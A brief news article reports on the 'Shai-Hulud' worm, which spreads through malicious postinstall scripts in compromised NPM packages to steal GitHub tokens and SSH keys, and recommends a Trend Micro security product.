New 'Shai-Hulud' Worm Threatens Open-Source Software Supply Chain
A new worm, dubbed 'Shai-Hulud', is causing concern in the open-source software community. It's targeting developers using Linux and macOS, aiming to steal sensitive credentials like GitHub access tokens and SSH keys. The worm has compromised over 187 packages in the NPM repository, the central hub for reusable code packages.
Shai-Hulud spreads by embedding a malicious 'postinstall' script in the package.json file of infected packages. Once installed, the multi-stage malware executes automatically. It's an evolution of an earlier threat actor campaign known as 's1ngularity'. The worm focuses on a maintainer's top 20 most popular packages to spread further.
Trend Micro, a leading cybersecurity company, recommends using Trend Vision One™ Threat Insights for defence against Shai-Hulud. This solution provides real-time threat intelligence to help stay ahead of evolving threats.
The Shai-Hulud worm's primary objective is to steal GitHub access tokens and SSH keys, posing a significant risk to the open-source software supply chain. With over 187 compromised packages in the NPM repository, developers are urged to stay vigilant and consider using Trend Micro's security solutions to protect their sensitive credentials.
Read also:
- Web3 gaming platform, Pixelverse, debuts on Base and Farcaster networks
- Amazon customer duped over Nvidia RTX 5070 Ti purchase: shipped item replaced with suspicious white powder; PC hardware fan deceived, discovers salt instead of GPU core days after receiving defective RTX 5090.
- Infiltration of Estonian airspace by Russian military aircraft
- Cyber aggression intensifies by China-backed TA415 group, targeting Taiwan's semiconductor production and supply networks
